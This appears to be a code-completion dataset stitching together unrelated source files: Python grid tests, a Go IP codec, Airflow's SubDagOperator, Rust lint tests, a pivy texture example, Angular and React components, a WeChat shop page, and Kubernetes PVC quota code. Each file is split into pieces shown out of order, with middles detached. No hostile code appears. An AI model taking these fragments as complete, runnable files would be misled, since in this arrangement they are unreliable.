' x: 4 y: 9',
' x: 4 y: 1',
' x: 5 y: 9',
' x: 5 y: 1',
' x: 6 y: 9',
' x: 6 y: 1',
' x: 7 y: 9',
' x: 7 y: 1',
' x: 8 y: 9',
' x: 8 y: 1']
for i in range(len(circle)):
assert(str(circle[i] == result[i]))
print('OK')
def position_properties():
print('Test: position_properties')
pos_1 = Position(x=1, y=2, angle=4)
pos_2 = Position(x=1, y=2, angle=4)
pos_3 = Position(x=1, angle=4, z=5, y=2)
assert(str(pos_1) == ' x: 1 y: 2 angle: 4')
assert(str(pos_2) == ' x: 1 y: 2 angle: 4')
assert(str(pos_3) == ' x: 1 y: 2 z: 5 angle: 4')
assert(pos_1 == pos_2)
assert(pos_1 != pos_3)
assert(pos_2 != pos_3)
poses = set([])
assert(len(poses) == 0)
poses.add(pos_1)
assert(len(poses) == 1)
poses.add(pos_3)
assert(len(poses) == 2)
poses.add(pos_2)
assert(len(poses) == 2)
print('OK')
if __name__ == '__main__':
map_to_grid_pos()
map_to_real_pos()
utils_bresenham_line()
utils_filled_midpoint_circle()
position_properties()
print('End of tests')
print('OK') | ' x: 2 y: 2',
' x: 3 y: 2',
' x: 4 y: 2', |
codec.go | package banman
import (
"io"
"net"
)
// ipType represents the different types of IP addresses supported by the
// BanStore interface.
type ipType = byte
const (
// ipv4 represents an IP address of type IPv4.
ipv4 ipType = 0
// ipv6 represents an IP address of type IPv6.
ipv6 ipType = 1
)
// encodeIPNet serializes the IP network into the given reader.
func encodeIPNet(w io.Writer, ipNet *net.IPNet) error |
// decodeIPNet deserialized an IP network from the given reader.
func decodeIPNet(r io.Reader) (*net.IPNet, error) {
// Read the IP address type and determine whether it is supported.
var ipType [1]byte
if _, err := r.Read(ipType[:]); err != nil {
return nil, err
}
var ipLen int
switch ipType[0] {
case ipv4:
ipLen = net.IPv4len
case ipv6:
ipLen = net.IPv6len
default:
return nil, ErrUnsupportedIP
}
// Once we have the type and its corresponding length, attempt to read
// it and its mask.
ip := make([]byte, ipLen)
if _, err := r.Read(ip); err != nil {
return nil, err
}
mask := make([]byte, ipLen)
if _, err := r.Read(mask); err != nil {
return nil, err
}
return &net.IPNet{IP: ip, Mask: mask}, nil
}
| {
// Determine the appropriate IP type for the IP address contained in the
// network.
var (
ip []byte
ipType ipType
)
switch {
case ipNet.IP.To4() != nil:
ip = ipNet.IP.To4()
ipType = ipv4
case ipNet.IP.To16() != nil:
ip = ipNet.IP.To16()
ipType = ipv6
default:
return ErrUnsupportedIP
}
// Write the IP type first in order to properly identify it when
// deserializing it, followed by the IP itself and its mask.
if _, err := w.Write([]byte{ipType}); err != nil {
return err
}
if _, err := w.Write(ip); err != nil {
return err
}
if _, err := w.Write([]byte(ipNet.Mask)); err != nil {
return err
}
return nil
} |
subdag.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The module which provides a way to nest your DAGs and so your levels of complexity."""
from enum import Enum
from typing import Dict, Optional
from sqlalchemy.orm.session import Session
from airflow.api.common.experimental.get_task_instance import get_task_instance
from airflow.exceptions import AirflowException, TaskInstanceNotFound
from airflow.models import DagRun
from airflow.models.dag import DAG, DagContext
from airflow.models.pool import Pool
from airflow.models.taskinstance import TaskInstance
from airflow.sensors.base import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.session import create_session, provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class SkippedStatePropagationOptions(Enum):
"""Available options for skipped state propagation of subdag's tasks to parent dag tasks."""
ALL_LEAVES = 'all_leaves'
ANY_LEAF = 'any_leaf'
class SubDagOperator(BaseSensorOperator):
"""
This runs a sub dag. By convention, a sub dag's dag_id
should be prefixed by its parent and a dot. As in `parent.child`.
Although SubDagOperator can occupy a pool/concurrency slot,
user can specify the mode=reschedule so that the slot will be
released periodically to avoid potential deadlock.
:param subdag: the DAG object to run as a subdag of the current DAG.
:param session: sqlalchemy session
:param conf: Configuration for the subdag
:type conf: dict
:param propagate_skipped_state: by setting this argument you can define
whether the skipped state of leaf task(s) should be propagated to the
parent dag's downstream task.
"""
ui_color = '#555'
ui_fgcolor = '#fff'
@provide_session
@apply_defaults
def __init__(
self,
*,
subdag: DAG,
session: Optional[Session] = None,
conf: Optional[Dict] = None,
propagate_skipped_state: Optional[SkippedStatePropagationOptions] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.subdag = subdag
self.conf = conf
self.propagate_skipped_state = propagate_skipped_state
self._validate_dag(kwargs)
self._validate_pool(session)
def _validate_dag(self, kwargs):
dag = kwargs.get('dag') or DagContext.get_current_dag()
if not dag:
raise AirflowException('Please pass in the `dag` param or call within a DAG context manager')
if dag.dag_id + '.' + kwargs['task_id'] != self.subdag.dag_id:
raise AirflowException(
"The subdag's dag_id should have the form '{{parent_dag_id}}.{{this_task_id}}'. "
"Expected '{d}.{t}'; received '{rcvd}'.".format(
d=dag.dag_id, t=kwargs['task_id'], rcvd=self.subdag.dag_id
)
)
def _validate_pool(self, session):
if self.pool:
conflicts = [t for t in self.subdag.tasks if t.pool == self.pool]
if conflicts:
# only query for pool conflicts if one may exist
pool = session.query(Pool).filter(Pool.slots == 1).filter(Pool.pool == self.pool).first()
if pool and any(t.pool == self.pool for t in self.subdag.tasks):
raise AirflowException(
'SubDagOperator {sd} and subdag task{plural} {t} both '
'use pool {p}, but the pool only has 1 slot. The '
'subdag tasks will never run.'.format(
sd=self.task_id,
plural=len(conflicts) > 1,
t=', '.join(t.task_id for t in conflicts),
p=self.pool,
)
)
def _get_dagrun(self, execution_date):
dag_runs = DagRun.find(
dag_id=self.subdag.dag_id,
execution_date=execution_date,
)
return dag_runs[0] if dag_runs else None
def _reset_dag_run_and_task_instances(self, dag_run, execution_date):
|
def pre_execute(self, context):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date)
if dag_run is None:
dag_run = self.subdag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=execution_date,
state=State.RUNNING,
conf=self.conf,
external_trigger=True,
)
self.log.info("Created DagRun: %s", dag_run.run_id)
if 'notification_server_uri' in context and context['notification_server_uri']:
from airflow.events.scheduler_events import DagRunCreatedEvent
from notification_service.client import NotificationClient
dag_run_created_event = DagRunCreatedEvent(
dag_id=self.subdag.dag_id,
execution_date=dag_run.execution_date
).to_event()
try:
client = NotificationClient(server_uri=context['notification_server_uri'],
default_namespace=dag_run_created_event.namespace,
sender=dag_run_created_event.sender)
self.log.info("SubDagOperator sending event: {}".format(dag_run_created_event))
client.send_event(dag_run_created_event)
finally:
client.close()
else:
self.log.info("Found existing DagRun: %s", dag_run.run_id)
if dag_run.state == State.FAILED:
self._reset_dag_run_and_task_instances(dag_run, execution_date)
def poke(self, context):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date=execution_date)
return dag_run.state != State.RUNNING
def post_execute(self, context, result=None):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date=execution_date)
self.log.info("Execution finished. State is %s", dag_run.state)
if dag_run.state != State.SUCCESS:
raise AirflowException(f"Expected state: SUCCESS. Actual state: {dag_run.state}")
if self.propagate_skipped_state and self._check_skipped_states(context):
self._skip_downstream_tasks(context)
def _check_skipped_states(self, context):
leaves_tis = self._get_leaves_tis(context['execution_date'])
if self.propagate_skipped_state == SkippedStatePropagationOptions.ANY_LEAF:
return any(ti.state == State.SKIPPED for ti in leaves_tis)
if self.propagate_skipped_state == SkippedStatePropagationOptions.ALL_LEAVES:
return all(ti.state == State.SKIPPED for ti in leaves_tis)
raise AirflowException(
f'Unimplemented SkippedStatePropagationOptions {self.propagate_skipped_state} used.'
)
def _get_leaves_tis(self, execution_date):
leaves_tis = []
for leaf in self.subdag.leaves:
try:
ti = get_task_instance(
dag_id=self.subdag.dag_id, task_id=leaf.task_id, execution_date=execution_date
)
leaves_tis.append(ti)
except TaskInstanceNotFound:
continue
return leaves_tis
def _skip_downstream_tasks(self, context):
self.log.info(
'Skipping downstream tasks because propagate_skipped_state is set to %s '
'and skipped task(s) were found.',
self.propagate_skipped_state,
)
downstream_tasks = context['task'].downstream_list
self.log.debug('Downstream task_ids %s', downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['execution_date'], downstream_tasks)
self.log.info('Done.')
| """
Set the DagRun state to RUNNING and set the failed TaskInstances to None state
for scheduler to pick up.
:param dag_run: DAG run
:param execution_date: Execution date
:return: None
"""
with create_session() as session:
dag_run.state = State.RUNNING
session.merge(dag_run)
failed_task_instances = (
session.query(TaskInstance)
.filter(TaskInstance.dag_id == self.subdag.dag_id)
.filter(TaskInstance.execution_date == execution_date)
.filter(TaskInstance.state.in_([State.FAILED, State.UPSTREAM_FAILED]))
)
for task_instance in failed_task_instances:
task_instance.state = State.NONE
session.merge(task_instance)
session.commit() |
lints.rs | use funcmap::FuncMap;
#[test]
fn non_camel_case_types_lint_is_allowed_on_derived_impl() {
#![deny(non_camel_case_types)]
#[allow(non_camel_case_types)]
#[derive(FuncMap)]
struct Test<t>(t);
}
#[test]
fn unused_qualifications_lint_is_allowed_on_derived_impl() {
#![deny(unused_qualifications)]
#[allow(unused_qualifications)]
#[derive(FuncMap)]
struct Test<T>(core::option::Option<T>);
}
#[test]
fn deprecated_lint_is_allowed_on_derived_impl() {
#![deny(deprecated)]
#[deprecated]
#[derive(FuncMap)]
struct Deprecated<T>(T);
#[allow(deprecated)]
#[derive(FuncMap)]
struct Test<T>(Deprecated<T>);
}
#[test]
fn drop_bounds_lint_is_allowed_on_derived_impl() {
#![deny(drop_bounds)]
#[allow(drop_bounds)]
#[derive(FuncMap)]
struct Test<T>(T)
where
T: Drop;
}
#[test]
fn dyn_drop_lint_is_allowed_on_derived_impl() {
#![deny(dyn_drop)]
#[allow(dyn_drop)] | #[derive(FuncMap)]
struct Test<T>(T)
where
for<'a> &'a dyn Drop: Copy;
}
#[test]
fn clippy_disallowed_method_lint_is_allowed_on_derived_impl() {
#![deny(clippy::disallowed_method)]
// methods `func_map` and `func_map_over` are disallowed via `clippy.toml`
#[allow(clippy::disallowed_method)]
#[derive(FuncMap)]
struct Test<T>(Option<T>);
}
#[test]
fn clippy_disallowed_type_lint_is_allowed_on_derived_impl() {
#![deny(clippy::disallowed_type)]
// type `Option` is disallowed via `clippy.toml`
#[allow(clippy::disallowed_type)]
#[derive(FuncMap)]
struct Test<T>(Option<T>);
} | #[allow(trivial_bounds)] |
07.2.TextureCoordinates.py | #!/usr/bin/env python
###
# Copyright (c) 2002-2007 Systems in Motion
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
###
# This is an example from the Inventor Mentor
# chapter 7, example 2.
#
# This example illustrates using texture coordindates on
# a Face Set.
#
import sys
from pivy.coin import *
from pivy.sogui import *
# set this variable to 0 if you want to use the other method
IV_STRICT = 1
def main():
# Initialize Inventor and Qt
myWindow = SoGui.init(sys.argv[0])
if myWindow == None: sys.exit(1)
root = SoSeparator()
# Choose a texture
brick = SoTexture2()
root.addChild(brick)
brick.filename = "brick.1.rgb"
if IV_STRICT:
# This is the preferred code for Inventor 2.1
# Using the new SoVertexProperty node is more efficient
myVertexProperty = SoVertexProperty()
# Define the square's spatial coordinates
myVertexProperty.vertex.set1Value(0, SbVec3f(-3, -3, 0))
myVertexProperty.vertex.set1Value(1, SbVec3f( 3, -3, 0)) |
# Define the square's normal
myVertexProperty.normal.set1Value(0, SbVec3f(0, 0, 1))
# Define the square's texture coordinates
myVertexProperty.texCoord.set1Value(0, SbVec2f(0, 0))
myVertexProperty.texCoord.set1Value(1, SbVec2f(1, 0))
myVertexProperty.texCoord.set1Value(2, SbVec2f(1, 1))
myVertexProperty.texCoord.set1Value(3, SbVec2f(0, 1))
# SoTextureCoordinateBinding node is now obsolete--in Inventor 2.1,
# texture coordinates will always be generated if none are
# provided.
#
# tBind = SoTextureCoordinateBinding()
# root.addChild(tBind)
# tBind.value(SoTextureCoordinateBinding.PER_VERTEX)
#
# Define normal binding
myVertexProperty.normalBinding = SoNormalBinding.OVERALL
# Define a FaceSet
myFaceSet = SoFaceSet()
root.addChild(myFaceSet)
myFaceSet.numVertices.set1Value(0, 4)
myFaceSet.vertexProperty.setValue(myVertexProperty)
else:
# Define the square's spatial coordinates
coord = SoCoordinate3()
root.addChild(coord)
coord.point.set1Value(0, SbVec3f(-3, -3, 0))
coord.point.set1Value(1, SbVec3f( 3, -3, 0))
coord.point.set1Value(2, SbVec3f( 3, 3, 0))
coord.point.set1Value(3, SbVec3f(-3, 3, 0))
# Define the square's normal
normal = SoNormal()
root.addChild(normal)
normal.vector.set1Value(0, SbVec3f(0, 0, 1))
# Define the square's texture coordinates
texCoord = SoTextureCoordinate2()
root.addChild(texCoord)
texCoord.point.set1Value(0, SbVec2f(0, 0))
texCoord.point.set1Value(1, SbVec2f(1, 0))
texCoord.point.set1Value(2, SbVec2f(1, 1))
texCoord.point.set1Value(3, SbVec2f(0, 1))
# Define normal binding
nBind = SoNormalBinding()
root.addChild(nBind)
nBind.value = SoNormalBinding.OVERALL
# SoTextureCoordinateBinding node is now obsolete--in Inventor 2.1,
# texture coordinates will always be generated if none are
# provided.
#
# tBind = SoTextureCoordinateBinding()
# root.addChild(tBind)
# tBind.value.setValue(SoTextureCoordinateBinding.PER_VERTEX)
#
# Define a FaceSet
myFaceSet = SoFaceSet()
root.addChild(myFaceSet)
myFaceSet.numVertices.set1Value(0, 4)
myViewer = SoGuiExaminerViewer(myWindow)
myViewer.setSceneGraph(root)
myViewer.setTitle("Texture Coordinates")
# In Inventor 2.1, if the machine does not have hardware texture
# mapping, we must override the default drawStyle to display textures.
# myViewer.setDrawStyle(SoGuiViewer.STILL, SoGuiViewer.VIEW_AS_IS)
myViewer.show()
SoGui.show(myWindow)
SoGui.mainLoop()
if __name__ == "__main__":
main() | myVertexProperty.vertex.set1Value(2, SbVec3f( 3, 3, 0))
myVertexProperty.vertex.set1Value(3, SbVec3f(-3, 3, 0)) |
products.component.ts | import { Component , OnInit } from '@angular/core';
import { AppService } from './app.service';
import { Router , ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs/Observable';
import { Title } from '@angular/platform-browser';
import { ToastsManager } from 'ng2-toastr/ng2-toastr';
import { Product } from './viewModels/product';
@Component({
moduleId:module.id,
selector:'',
templateUrl:'./products.component.html'
})
export class ProductsComponent implements OnInit{
products$:Observable<Array<Product>>;
categoryID:string
constructor( private title:Title , private appService:AppService , private router:Router ,
private route:ActivatedRoute , private toaster:ToastsManager) { }
ngOnInit()
{
//let categoryID;
this.route.params.forEach( (params) => {
this.categoryID = params['id'];
this.title.setTitle(this.categoryID);
this.products$ = this.appService.GetProducts(this.categoryID);
});
} |
} | |
test-table.tsx | import classNames from 'classnames';
import { TestRow } from '@teambit/ui.test-row';
import { timeFormat } from '@teambit/time.time-format';
import React from 'react';
import { Icon } from '@teambit/evangelist.elements.icon';
import { TestsFiles, TestResult } from '@teambit/tester';
import { TestFileTitle } from './test-file-title';
import { getStatusIcon } from './utils';
import styles from './test-table.module.scss';
export type TestTableProps = {
testResults: TestsFiles[];
} & React.HTMLAttributes<HTMLDivElement>;
export function TestTable({ testResults }: TestTableProps) {
if (!testResults || testResults.length === 0) return null;
return (
<>
{testResults.map((testFile, index) => {
const testHasErrors = testFile?.error?.failureMessage;
const borderColor = testFile.failed > 0 || testHasErrors ? '#e62e5c' : '#37b26c';
return (
<div key={index} className={styles.testTable}>
<TestFileTitle style={{ borderColor }} testFile={testFile} />
{testHasErrors && <TestSuiteError key={testHasErrors} name={testFile.file} error={testHasErrors} />}
{!testHasErrors &&
testFile.tests.map((test) => {
return <TestLine key={test.name} test={test} />;
})}
</div>
);
})}
</>
);
}
|
return (
<TestRow className={classNames(styles.testRow, styles[test.status])} content={test.error}>
<div className={styles.testTitle}>
<div className={styles.test}>
{getStatusIcon(test.status)}
<TestBreadcrumbs test={test} />
</div>
<div className={styles.duration}>
<span>{duration}</span>
<Icon of="clock" />
</div>
</div>
</TestRow>
);
}
function TestSuiteError({ name, error }: { name: string; error: string }) {
return (
<TestRow className={classNames(styles.testRow, styles.failed)} content={error}>
<div className={styles.testTitle}>
<div className={styles.test}>
{getStatusIcon('failed')}
<div>{name}</div>
</div>
</div>
</TestRow>
);
}
function TestBreadcrumbs({ test }: { test: TestResult }) {
if (test.status === 'failed') {
const nameIndentVal = test.ancestor.length * 8;
return (
<div className={classNames(styles.testBreadcrumbs)}>
{test.ancestor.map((a) => {
const indentVal = test.ancestor.indexOf(a) * 8;
return <div style={{ paddingLeft: `${indentVal}px` }} key={a}>{`${a}`}</div>;
})}
<div style={{ paddingLeft: `${nameIndentVal}px` }}>{test.name}</div>
</div>
);
}
return (
<div className={classNames(styles.testBreadcrumbs, styles.singleLine)}>
{test.ancestor.map((a) => {
return <span key={a}>{`${a} > `}</span>;
})}
<div>{test.name}</div>
</div>
);
} | function TestLine({ test }: { test: TestResult }) {
const duration = test.duration && timeFormat(+test.duration); |
shop.js | if (typeof wx === 'undefined') var wx = getApp().core;
var utils = getApp().helper;
var app = getApp();
var api = getApp().api;
var quickNavigation = require('./../../components/quick-navigation/quick-navigation.js');
Page({
/**
* 页面的初始数据
| data: {
tab: 1,
sort: 1,
coupon_list: [],
copy: false,
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function(options) {
getApp().page.onLoad(this, options);
quickNavigation.init(this);
var self = this;
if (typeof my === 'undefined') {
if (options.scene) {
var scene = decodeURIComponent(options.scene);
if (scene) {
scene = utils.scene_decode(scene);
if (scene.mch_id) {
options.mch_id = scene.mch_id;
}
}
}
} else {
if (getApp().query !== null) {
var query = getApp().query;
getApp().query = null;
options.mch_id = query.mch_id;
}
}
self.setData({
tab: options.tab || 1,
sort: options.sort || 1,
mch_id: options.mch_id || false,
cat_id: options.cat_id || '',
});
if (!self.data.mch_id) {
getApp().core.showModal({
title: '提示',
content: '店铺不存在!店铺id为空'
});
}
setInterval(function() {
self.onScroll();
}, 40);
this.getShopData();
},
quickNavigation: function() {
var status = 0;
this.setData({
quick_icon: !this.data.quick_icon
})
var store = this.data.store;
var animationPlus = getApp().core.createAnimation({
duration: 300,
timingFunction: 'ease-out',
});
var x = -55;
if (!this.data.quick_icon) {
animationPlus.translateY(x).opacity(1).step();
} else {
animationPlus.opacity(0).step();
}
this.setData({
animationPlus: animationPlus.export(),
});
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function() {
getApp().page.onReady(this);
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function() {
getApp().page.onShow(this);
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function() {
getApp().page.onHide(this);
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function() {
getApp().page.onUnload(this);
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function() {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function() {
var self = this;
self.getGoodsList();
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
getApp().page.onShareAppMessage(this);
var self = this;
var user_info = getApp().getUser();
return {
path: "/mch/shop/shop?user_id=" + user_info.id + 'mch_id=' + self.data.mch_id,
title: self.data.shop ? self.data.shop.name : '商城首页',
};
},
kfuStart: function() {
this.setData({
copy: true,
})
},
kfuEnd: function() {
this.setData({
copy: false,
})
},
copyinfo: function(e) {
getApp().core.setClipboardData({
data: e.target.dataset.info,
success: function(res) {
getApp().core.showToast({
title: '复制成功!',
icon: 'success',
duration: 2000,
mask: true
})
}
});
},
callPhone: function(e) {
getApp().core.makePhoneCall({
phoneNumber: e.target.dataset.info
})
},
onScroll: function(e) {
var self = this;
getApp().core.createSelectorQuery().selectViewport('.after-navber').scrollOffset(function(res) {
var limit = self.data.tab == 2 ? 136.5333 : 85.3333;
if (res.scrollTop >= limit) {
self.setData({
fixed: true,
});
} else {
self.setData({
fixed: false,
});
}
}).exec();
},
getShopData: function() {
var self = this;
var current_page = self.data.current_page || 0;
var target_page = current_page + 1;
var cache_key = 'shop_data_mch_id_' + self.data.mch_id;
var cache_data = getApp().core.getStorageSync(cache_key);
if (cache_data) {
self.setData({
shop: cache_data.shop,
});
}
getApp().core.showNavigationBarLoading();
self.setData({
loading: true,
});
getApp().request({
url: getApp().api.mch.shop,
data: {
mch_id: self.data.mch_id,
tab: self.data.tab,
sort: self.data.sort,
page: target_page,
cat_id: self.data.cat_id,
},
success: function(res) {
if (res.code == 1) {
getApp().core.showModal({
title: '提示',
content: res.msg,
showCancel: false,
success: function(e) {
if (e.confirm) {
getApp().core.redirectTo({
url: '/pages/index/index',
});
}
}
});
return;
}
if (res.code == 0) {
self.setData({
shop: res.data.shop,
coupon_list: res.data.coupon_list,
hot_list: res.data.goods_list,
goods_list: res.data.goods_list,
new_list: res.data.new_list,
current_page: target_page,
cs_icon: res.data.shop.cs_icon,
});
getApp().core.setStorageSync(cache_key, res.data);
}
},
complete: function() {
getApp().core.hideNavigationBarLoading();
self.setData({
loading: false,
});
}
});
},
getGoodsList: function() {
var self = this;
if (self.data.tab == 3) {
return;
}
if (self.data.loading) {
return;
}
if (self.data.no_more) {
return;
}
self.setData({
loading: true,
});
var current_page = self.data.current_page || 0;
var target_page = current_page + 1;
getApp().request({
url: getApp().api.mch.shop,
data: {
mch_id: self.data.mch_id,
tab: self.data.tab,
sort: self.data.sort,
page: target_page,
cat_id: self.data.cat_id,
},
success: function(res) {
if (res.code == 0) {
if (self.data.tab == 1) {
if (res.data.goods_list && res.data.goods_list.length) {
self.data.hot_list = self.data.hot_list.concat(res.data.goods_list);
self.setData({
hot_list: self.data.hot_list,
current_page: target_page,
});
} else {
self.setData({
no_more: true,
});
}
}
if (self.data.tab == 2) {
if (res.data.goods_list && res.data.goods_list.length) {
self.data.goods_list = self.data.goods_list.concat(res.data.goods_list);
self.setData({
goods_list: self.data.goods_list,
current_page: target_page,
});
} else {
self.setData({
no_more: true,
});
}
}
}
},
complete: function() {
self.setData({
loading: false,
});
}
});
},
}); | */
|
persistent_volume_claims.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package core
import (
"fmt"
"strings"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/resource"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apiserver/pkg/admission"
quota "k8s.io/apiserver/pkg/quota/v1"
"k8s.io/apiserver/pkg/quota/v1/generic"
utilfeature "k8s.io/apiserver/pkg/util/feature"
api "k8s.io/kubernetes/pkg/apis/core"
k8s_api_v1 "k8s.io/kubernetes/pkg/apis/core/v1"
"k8s.io/kubernetes/pkg/apis/core/v1/helper"
k8sfeatures "k8s.io/kubernetes/pkg/features"
)
// the name used for object count quota
var pvcObjectCountName = generic.ObjectCountQuotaResourceNameFor(corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims").GroupResource())
// pvcResources are the set of static resources managed by quota associated with pvcs.
// for each resource in this list, it may be refined dynamically based on storage class.
var pvcResources = []corev1.ResourceName{
corev1.ResourcePersistentVolumeClaims,
corev1.ResourceRequestsStorage,
}
// storageClassSuffix is the suffix to the qualified portion of storage class resource name.
// For example, if you want to quota storage by storage class, you would have a declaration
// that follows <storage-class>.storageclass.storage.k8s.io/<resource>.
// For example:
// * gold.storageclass.storage.k8s.io/: 500Gi
// * bronze.storageclass.storage.k8s.io/requests.storage: 500Gi
const storageClassSuffix string = ".storageclass.storage.k8s.io/"
/* TODO: prune?
// ResourceByStorageClass returns a quota resource name by storage class.
func ResourceByStorageClass(storageClass string, resourceName corev1.ResourceName) corev1.ResourceName {
return corev1.ResourceName(string(storageClass + storageClassSuffix + string(resourceName)))
}
*/
// V1ResourceByStorageClass returns a quota resource name by storage class.
func V1ResourceByStorageClass(storageClass string, resourceName corev1.ResourceName) corev1.ResourceName {
return corev1.ResourceName(string(storageClass + storageClassSuffix + string(resourceName)))
}
// NewPersistentVolumeClaimEvaluator returns an evaluator that can evaluate persistent volume claims
func NewPersistentVolumeClaimEvaluator(f quota.ListerForResourceFunc) quota.Evaluator {
listFuncByNamespace := generic.ListResourceUsingListerFunc(f, corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims"))
pvcEvaluator := &pvcEvaluator{listFuncByNamespace: listFuncByNamespace}
return pvcEvaluator
}
// pvcEvaluator knows how to evaluate quota usage for persistent volume claims
type pvcEvaluator struct {
// listFuncByNamespace knows how to list pvc claims
listFuncByNamespace generic.ListFuncByNamespace
}
// Constraints verifies that all required resources are present on the item.
func (p *pvcEvaluator) Constraints(required []corev1.ResourceName, item runtime.Object) error {
// no-op for persistent volume claims
return nil
}
// GroupResource that this evaluator tracks
func (p *pvcEvaluator) GroupResource() schema.GroupResource {
return corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims").GroupResource()
}
// Handles returns true if the evaluator should handle the specified operation.
func (p *pvcEvaluator) Handles(a admission.Attributes) bool {
op := a.GetOperation() | return true
}
return false
}
// Matches returns true if the evaluator matches the specified quota with the provided input item
func (p *pvcEvaluator) Matches(resourceQuota *corev1.ResourceQuota, item runtime.Object) (bool, error) {
return generic.Matches(resourceQuota, item, p.MatchingResources, generic.MatchesNoScopeFunc)
}
// MatchingScopes takes the input specified list of scopes and input object. Returns the set of scopes resource matches.
func (p *pvcEvaluator) MatchingScopes(item runtime.Object, scopes []corev1.ScopedResourceSelectorRequirement) ([]corev1.ScopedResourceSelectorRequirement, error) {
return []corev1.ScopedResourceSelectorRequirement{}, nil
}
// UncoveredQuotaScopes takes the input matched scopes which are limited by configuration and the matched quota scopes.
// It returns the scopes which are in limited scopes but dont have a corresponding covering quota scope
func (p *pvcEvaluator) UncoveredQuotaScopes(limitedScopes []corev1.ScopedResourceSelectorRequirement, matchedQuotaScopes []corev1.ScopedResourceSelectorRequirement) ([]corev1.ScopedResourceSelectorRequirement, error) {
return []corev1.ScopedResourceSelectorRequirement{}, nil
}
// MatchingResources takes the input specified list of resources and returns the set of resources it matches.
func (p *pvcEvaluator) MatchingResources(items []corev1.ResourceName) []corev1.ResourceName {
result := []corev1.ResourceName{}
for _, item := range items {
// match object count quota fields
if quota.Contains([]corev1.ResourceName{pvcObjectCountName}, item) {
result = append(result, item)
continue
}
// match pvc resources
if quota.Contains(pvcResources, item) {
result = append(result, item)
continue
}
// match pvc resources scoped by storage class (<storage-class-name>.storage-class.kubernetes.io/<resource>)
for _, resource := range pvcResources {
byStorageClass := storageClassSuffix + string(resource)
if strings.HasSuffix(string(item), byStorageClass) {
result = append(result, item)
break
}
}
}
return result
}
// Usage knows how to measure usage associated with item.
func (p *pvcEvaluator) Usage(item runtime.Object) (corev1.ResourceList, error) {
result := corev1.ResourceList{}
pvc, err := toExternalPersistentVolumeClaimOrError(item)
if err != nil {
return result, err
}
// charge for claim
result[corev1.ResourcePersistentVolumeClaims] = *(resource.NewQuantity(1, resource.DecimalSI))
result[pvcObjectCountName] = *(resource.NewQuantity(1, resource.DecimalSI))
storageClassRef := helper.GetPersistentVolumeClaimClass(pvc)
if len(storageClassRef) > 0 {
storageClassClaim := corev1.ResourceName(storageClassRef + storageClassSuffix + string(corev1.ResourcePersistentVolumeClaims))
result[storageClassClaim] = *(resource.NewQuantity(1, resource.DecimalSI))
}
// charge for storage
if request, found := pvc.Spec.Resources.Requests[corev1.ResourceStorage]; found {
roundedRequest := request.DeepCopy()
if !roundedRequest.RoundUp(0) {
// Ensure storage requests are counted as whole byte values, to pass resourcequota validation.
// See http://issue.k8s.io/94313
request = roundedRequest
}
result[corev1.ResourceRequestsStorage] = request
// charge usage to the storage class (if present)
if len(storageClassRef) > 0 {
storageClassStorage := corev1.ResourceName(storageClassRef + storageClassSuffix + string(corev1.ResourceRequestsStorage))
result[storageClassStorage] = request
}
}
return result, nil
}
// UsageStats calculates aggregate usage for the object.
func (p *pvcEvaluator) UsageStats(options quota.UsageStatsOptions) (quota.UsageStats, error) {
return generic.CalculateUsageStats(options, p.listFuncByNamespace, generic.MatchesNoScopeFunc, p.Usage)
}
// ensure we implement required interface
var _ quota.Evaluator = &pvcEvaluator{}
func toExternalPersistentVolumeClaimOrError(obj runtime.Object) (*corev1.PersistentVolumeClaim, error) {
pvc := &corev1.PersistentVolumeClaim{}
